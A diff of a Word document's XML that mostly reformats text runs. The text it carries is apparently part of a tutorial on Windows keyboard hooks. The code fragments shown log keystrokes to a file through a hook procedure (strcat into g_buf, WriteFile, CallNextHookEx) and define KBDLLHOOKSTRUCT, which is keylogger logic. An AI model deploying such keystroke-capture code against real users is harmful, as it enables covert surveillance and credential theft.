-        <w:t>winID</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>))</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6635,32 +4442,26 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
           <w:sz w:val="12"/>
           <w:szCs w:val="12"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
         <w:t>{</w:t>
       </w:r>
     </w:p>
@@ -6676,69 +4477,36 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
           <w:sz w:val="12"/>
           <w:szCs w:val="12"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:t>strcpy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> + 1, "\r\n");</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(g_buf, "[unknown]\r\n");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6761,115 +4529,28 @@
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
           <w:sz w:val="12"/>
           <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WriteFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>), &amp;written, NULL);</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6930,27 +4611,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>else</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>}</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6975,421 +4637,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, "[unknown]\r\n");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WriteFile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">file, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strlen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>g_buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>), &amp;written, NULL);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
-        </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CallNextHookEx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(hook, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>return CallNextHookEx(hook, nCode, wParam, lParam);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7452,18 +4700,153 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>typedef</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>typedef struct {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  vkCode;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  scanCode;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  flags;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  time;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ULONG_PTR  dwExtraInfo;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vkCode </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
